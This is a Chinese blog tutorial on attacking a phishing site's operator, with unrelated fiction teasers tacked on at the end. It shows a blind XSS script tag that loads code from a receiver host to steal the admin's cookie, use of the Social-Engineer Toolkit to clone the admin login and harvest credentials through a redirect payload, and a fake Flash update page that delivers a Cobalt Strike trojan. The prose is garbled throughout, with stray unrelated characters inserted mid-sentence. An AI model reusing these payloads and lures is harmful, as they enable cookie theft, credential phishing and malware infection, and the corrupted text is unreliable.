XSS 實(shí)戰(zhàn)攻擊思路總結(jié)

鑒別網(wǎng)站

下面是一個(gè)經(jīng)典的 QQ 空間釣魚網(wǎng)站:

域名分析

釣魚網(wǎng)站最直觀的就是看域名忘分,可以看到目標(biāo)網(wǎng)站域名 :qq.xps.com 盡管域名中出現(xiàn)了 qq 字樣朋其,但是一級(jí)域名卻是 xps.com 這一點(diǎn)就直接暴露了釣魚網(wǎng)站的本性怒竿。

早期還有一種利用拉丁字母注冊(cè)的域名偽造釣魚網(wǎng)站的案例,這種就比較逼真了,下面國(guó)光簡(jiǎn)單列舉一些:

OPPO 官網(wǎng) 真假域名

# 真域名www.oppo.com# 假域名www.οppο.com

Pornhub 官網(wǎng)真假域名

# 真域名www.pornhub.com# 假域名www.ρornhub.com

唯品會(huì)官網(wǎng) 真假域名

# 真域名www.vip.com# 假域名www.νip.com

關(guān)于這類域名就不再列舉了拍屑,早期這種方法成功率是非常的高的荷辕,有時(shí)候甚至都可以欺騙到我們這種專業(yè)的信息安全從業(yè)者凿跳。

功能分析

釣魚網(wǎng)站既然是要釣魚的話,說那么多半還會(huì)有后臺(tái)管理功能疮方。所以使用常規(guī)的目錄掃描工具多半可以掃描出一些端倪出來:

dirsearch -u"http://qq.xps.com/"-e * -x301

果然掃描出了這個(gè) QQ 空間釣魚網(wǎng)站的后臺(tái)登錄口了:http://qq.xps.com/admin/login.php

至此基本上已經(jīng)可以確定這個(gè)目標(biāo)網(wǎng)站就是傳說中的釣魚網(wǎng)站了控嗜,下面來看一下這個(gè)釣魚網(wǎng)站是如何運(yùn)作的吧。

釣魚流程

小白用戶前臺(tái)輸入自己的 QQ 賬號(hào)和密碼信息骡显,點(diǎn)擊登錄后域名跳轉(zhuǎn)到真正的 QQ 官網(wǎng):

然后用戶再輸入自己的 QQ 賬號(hào)和密碼就可以成功登陸了疆栏。

目前很多釣魚網(wǎng)站都是這種思路,這可以讓被釣者產(chǎn)生一種自己第一次是密碼不小心輸入錯(cuò)誤的錯(cuò)覺惫谤,從而放松警惕壁顶,妙啊溜歪!真是妙蛙種子吃著妙脆角若专,妙進(jìn)了米奇妙妙屋 妙到家了

然后釣魚網(wǎng)站的管理員每天會(huì)到自己的 QQ 空間釣魚管理中心里面看看今天又有哪些菜雞上鉤了:

可以看到上鉤者的 QQ 號(hào)為:1314520 密碼為:sbhac... 唉,不對(duì)勁蝴猪?貌似自己被羞辱了一番......

攻擊思路

本文主要是來梳理一下 XSS 常劍的攻擊思路调衰,關(guān)于 XSS 以為的思路不在本文的敘述范圍內(nèi),另外如果有小伙伴要不錯(cuò)新的姿勢(shì)的話歡迎評(píng)論區(qū)里面或者郵件留言自阱,國(guó)光日后會(huì)繼續(xù)完善本文的嚎莉。

思路一:XSS 盲打

如果目標(biāo)網(wǎng)站存在 XSS 的話且沒有 httponly 防御 cookie 那么就可以直接盲打 XSS。首先準(zhǔn)備一個(gè) XSS 靶場(chǎng)沛豌,國(guó)光這里比較推薦 Github 上面開源的藍(lán)蓮花 XSS 平臺(tái)萝喘。

官方項(xiàng)目地址為:https://github.com/firesunCN/BlueLotus_XSSReceiver

可惜已經(jīng)清空數(shù)據(jù)了,還好國(guó)光我 fork 了一份:

國(guó)光 fork 的項(xiàng)目地址為:https://github.com/sqlsec/BlueLotus_XSSReceiver

然后使用 XSS 平臺(tái)里面的模塊來生成一個(gè) XSS payload:

<scriptsrc="http://10.20.24.244/xss/myjs/x.js"></script>

可以去掉多余的雙引號(hào):

<scriptsrc=http://10.20.24.244/xss/myjs/x.js></script>

然后回到釣魚網(wǎng)站前臺(tái),在用戶名或者密碼出插入 payload(理論上來說 密碼處成功率要高一點(diǎn))阁簸,如果有表單長(zhǎng)度限制的話爬早,可以手工審查元素修改 input 的長(zhǎng)度限制:

這樣黑客攻擊的步驟基本上就走完了,下面回到釣魚網(wǎng)站管理員的視角启妹。

釣魚網(wǎng)站的搭建者到自己的 QQ 空間釣魚管理中心里面看看今天又有哪些菜雞上鉤了:

發(fā)現(xiàn)真的有菜雞上鉤筛严,密碼居然是 1111111111 嘴角忍不住上仰。

此時(shí)他不知道的是饶米,用戶賬號(hào)旁邊實(shí)際上有一串 JS 代碼被解析了桨啃,而此時(shí)黑客在 XSS 平臺(tái)里面可以直接看到管理員已經(jīng)上鉤了:

可以直接看到管理員的后臺(tái)地址和 cookie 信息,拿到后臺(tái)地址和 Cookie 信息就可以直接抓包替換 Cookie 登錄到釣魚網(wǎng)站的后臺(tái)檬输,這些基本操作國(guó)光我就不在啰嗦了照瘾,下面來說一下另一種思路。

思路二:SET 釣魚

假設(shè)目標(biāo)網(wǎng)站存在 httppnly 的話丧慈,我們拿到的 cookie 信息也是不完整的析命,所以傳統(tǒng)的思路是行不通的,這種情況下該怎么辦呢逃默?仔細(xì)想想鹃愤,既然不能正面肛 httponly 的話,那么為什么不考慮繞過他呢完域?

下面國(guó)光主要描述一下如何使用 Kali Linux 里面的 set 社工工程學(xué)工具包來進(jìn)行釣魚软吐。

SET 在 Kali Linux 里面的全稱是 social engineering toolkit:

Github 項(xiàng)目地址為https://github.com/trustedsec/social-engineer-toolkit

點(diǎn)擊即可直接啟動(dòng),首先會(huì)看到如下的菜單:

Select from the menu:1)Social-Engineering Attacks# 社會(huì)工程攻擊2)Penetration Testing(Fast-Track)# 滲透測(cè)試(快速通道)3)Third Party Modules# 第三方模塊4)Update the Social-Engineer Toolkit# 更新 SET5)Update SET configuration# 更新 SET 配置6)Help, Credits, and About# 幫助99)Exit the Social-Engineer Toolkit# 退出set>1

選擇 1 后進(jìn)入到下面的菜單:

Select from the menu:1)Spear-Phishing Attack Vectors# 魚叉式網(wǎng)絡(luò)釣魚攻擊2)Website Attack Vectors# 網(wǎng)站攻擊3)Infectious Media Generator# 感染性介質(zhì)生成4)Create a Payload and Listener# 創(chuàng)建 Payload 和 監(jiān)聽器5)Mass Mailer Attack# 群發(fā)郵件6)Arduino-Based Attack Vector# 基于 Arduino 的攻擊7)Wireless Access Point Attack Vector# 無線接入點(diǎn)攻擊8)QRCode Generator Attack Vector# 二維碼生成器攻擊9)Powershell Attack Vectors# Powershell 攻擊10)Third Party Modules# 第三方模塊99)Return back to the main menu.# 返回主菜單set>2

選擇 2 后進(jìn)入到下面的菜單:

1)Java Applet Attack Method# Java Applet 攻擊2)Metasploit Browser Exploit Method# Metasploit Browser 瀏覽器攻擊3)Credential Harvester Attack Method# 憑證竊取攻擊4)Tabnabbing Attack Method# 標(biāo)簽頁(yè)劫持? ? ? 5)Web Jacking Attack Method# 網(wǎng)頁(yè)劫持攻擊6)Multi-Attack Web Method# 綜合網(wǎng)頁(yè)攻擊7)HTA Attack Method# HTA 攻擊99)Return to Main Menu# 返回主菜單set:webattack>3

選擇 3 進(jìn)入到下面的菜單:

1)Web Templates# 網(wǎng)站模板2)Site Cloner# 站點(diǎn)克隆3)Custom Import# 自定義導(dǎo)入99)Return to Webattack Menu# 返回主菜單set:webattack>2

選擇 2 然后具體看下下面的操作:

這個(gè)時(shí)候一個(gè)假的釣魚網(wǎng)站就制作完成了吟税,訪問 Kali Linux 的 80 端 10.20.25.39 效果如下:

這個(gè)登錄入口和 qq.xps.com/admin/login.php 的登錄口一模一樣:

現(xiàn)在的任務(wù)就是想辦法讓管理員在假的網(wǎng)站里面輸入網(wǎng)站的后臺(tái)用戶名和密碼信息凹耙,那么該怎么誘導(dǎo)管理員點(diǎn)擊呢?對(duì)肠仪,聰明的網(wǎng)友肯定想到了使兔,還是利用 XSS,準(zhǔn)備下方的 payload藤韵,這個(gè) XSS 的作用就是普通的鏈接跳轉(zhuǎn):

<script>window.location.</script>

然后將這個(gè) payload 插入到釣魚網(wǎng)站的后臺(tái)中:

此時(shí)管理員到自己的 QQ 空間釣魚管理中心里面看看今天又有哪些菜雞上鉤了,結(jié)果沒想到網(wǎng)站瀏覽器卻跳轉(zhuǎn)到了:10.20.25.39 頁(yè)面熊经,這個(gè)就是我們制作的假的QQ 空間釣魚管理中心的登錄界面泽艘。

如果管理員大意的話,這個(gè)時(shí)候會(huì)以為登錄會(huì)話超期了镐依,需要重新登錄匹涮,就在我們假的網(wǎng)站后臺(tái)里面輸入了真正的密碼:

我們這個(gè)假的網(wǎng)站也非常妙,登錄后自動(dòng)轉(zhuǎn)發(fā)到正確的網(wǎng)站登錄成功槐壳,真是學(xué)以致用呀~~

管理員放松警惕的同時(shí)然低,我們的 Kali Linux 里也竊取到管理員的明文賬號(hào)和密碼信息了:

拿到這個(gè)后臺(tái)就可以成功登陸了,Bingo ~

當(dāng)然如果管理員是一個(gè)有很高安全意識(shí)的人,可能是不會(huì)上當(dāng)?shù)啮ㄈ粒景咐齼H供意淫參考使用带兜,實(shí)際運(yùn)用還是得看運(yùn)氣。

思路三:Flash 釣魚

這也是 B 站 視頻里面提到過的方法吨灭,首先我們需要準(zhǔn)備一個(gè)釣魚頁(yè)面刚照,這里在 Github 上搜索到了 2 個(gè) 相關(guān)的項(xiàng)目,下面分別展示一下:

項(xiàng)目地址https://github.com/Wileysec/adobe-flash-phishing-page

模仿的 Flash Player 中文官網(wǎng)的頁(yè)面

項(xiàng)目地址:?https://github.com/r00tSe7en/Flash-Pop

這種的就要稍微激進(jìn)一點(diǎn)喧兄,強(qiáng)迫癥都會(huì)忍不住去點(diǎn)擊下載的:

國(guó)光這里選擇了第 2 種激進(jìn)的方法无畔,點(diǎn)擊立即升級(jí)的這個(gè)按鈕點(diǎn)擊會(huì)下載好國(guó)光我準(zhǔn)備好的 CS 木馬。如果管理員以為自己的 Flash 版本過低的話吠冤,可能會(huì)下載并運(yùn)行這個(gè)木馬:

這里偷懶了沒有給 Flash.exe 添加圖標(biāo)偽造一下浑彰,關(guān)于圖標(biāo)偽造大家可以參考之前的文章:

為 Cobalt Strike exe 木馬添加圖標(biāo)

如果順利的話就會(huì)成功上線 CS:

總結(jié)

免責(zé)聲明:本文出現(xiàn)的思路案例僅供網(wǎng)絡(luò)安全學(xué)習(xí)和研究技術(shù)使用,禁止使用本文的攻擊技術(shù)工具用于非法用途拯辙,否則后果自負(fù)郭变,另外文中所使用的 QQ 空間釣魚網(wǎng)站是人為修改的漏洞靶場(chǎng)。

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末薄风,一起剝皮案震驚了整個(gè)濱河市饵较,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌遭赂,老刑警劉巖循诉,帶你破解...
    沈念sama閱讀 206,968評(píng)論 6 482
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場(chǎng)離奇詭異撇他,居然都是意外死亡茄猫,警方通過查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 88,601評(píng)論 2 382
  • 文/潘曉璐 我一進(jìn)店門困肩,熙熙樓的掌柜王于貴愁眉苦臉地迎上來划纽,“玉大人,你說我怎么就攤上這事锌畸∮铝樱” “怎么了?”我有些...
    開封第一講書人閱讀 153,220評(píng)論 0 344
  • 文/不壞的土叔 我叫張陵潭枣,是天一觀的道長(zhǎng)比默。 經(jīng)常有香客問我,道長(zhǎng)盆犁,這世上最難降的妖魔是什么命咐? 我笑而不...
    開封第一講書人閱讀 55,416評(píng)論 1 279
  • 正文 為了忘掉前任,我火速辦了婚禮谐岁,結(jié)果婚禮上醋奠,老公的妹妹穿的比我還像新娘榛臼。我一直安慰自己,他們只是感情好窜司,可當(dāng)我...
    茶點(diǎn)故事閱讀 64,425評(píng)論 5 374
  • 文/花漫 我一把揭開白布沛善。 她就那樣靜靜地躺著,像睡著了一般例证。 火紅的嫁衣襯著肌膚如雪路呜。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 49,144評(píng)論 1 285
  • 那天织咧,我揣著相機(jī)與錄音胀葱,去河邊找鬼。 笑死笙蒙,一個(gè)胖子當(dāng)著我的面吹牛抵屿,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播捅位,決...
    沈念sama閱讀 38,432評(píng)論 3 401
  • 文/蒼蘭香墨 我猛地睜開眼轧葛,長(zhǎng)吁一口氣:“原來是場(chǎng)噩夢(mèng)啊……” “哼!你這毒婦竟也來了艇搀?” 一聲冷哼從身側(cè)響起尿扯,我...
    開封第一講書人閱讀 37,088評(píng)論 0 261
  • 序言:老撾萬榮一對(duì)情侶失蹤,失蹤者是張志新(化名)和其女友劉穎焰雕,沒想到半個(gè)月后衷笋,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 43,586評(píng)論 1 300
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡矩屁,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 36,028評(píng)論 2 325
  • 正文 我和宋清朗相戀三年马胧,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了捷雕。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片瓤湘。...
    茶點(diǎn)故事閱讀 38,137評(píng)論 1 334
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡备蚓,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出烁峭,到底是詐尸還是另有隱情容客,我是刑警寧澤,帶...
    沈念sama閱讀 33,783評(píng)論 4 324
  • 正文 年R本政府宣布约郁,位于F島的核電站缩挑,受9級(jí)特大地震影響,放射性物質(zhì)發(fā)生泄漏棍现。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 39,343評(píng)論 3 307
  • 文/蒙蒙 一镜遣、第九天 我趴在偏房一處隱蔽的房頂上張望己肮。 院中可真熱鬧士袄,春花似錦、人聲如沸谎僻。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,333評(píng)論 0 19
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)艘绍。三九已至赤拒,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間诱鞠,已是汗流浹背挎挖。 一陣腳步聲響...
    開封第一講書人閱讀 31,559評(píng)論 1 262
  • 我被黑心中介騙來泰國(guó)打工, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留航夺,地道東北人蕉朵。 一個(gè)月前我還...
    沈念sama閱讀 45,595評(píng)論 2 355
  • 正文 我出身青樓,卻偏偏與公主長(zhǎng)得像阳掐,于是被迫代替她去往敵國(guó)和親始衅。 傳聞我的和親對(duì)象是個(gè)殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 42,901評(píng)論 2 345

推薦閱讀更多精彩內(nèi)容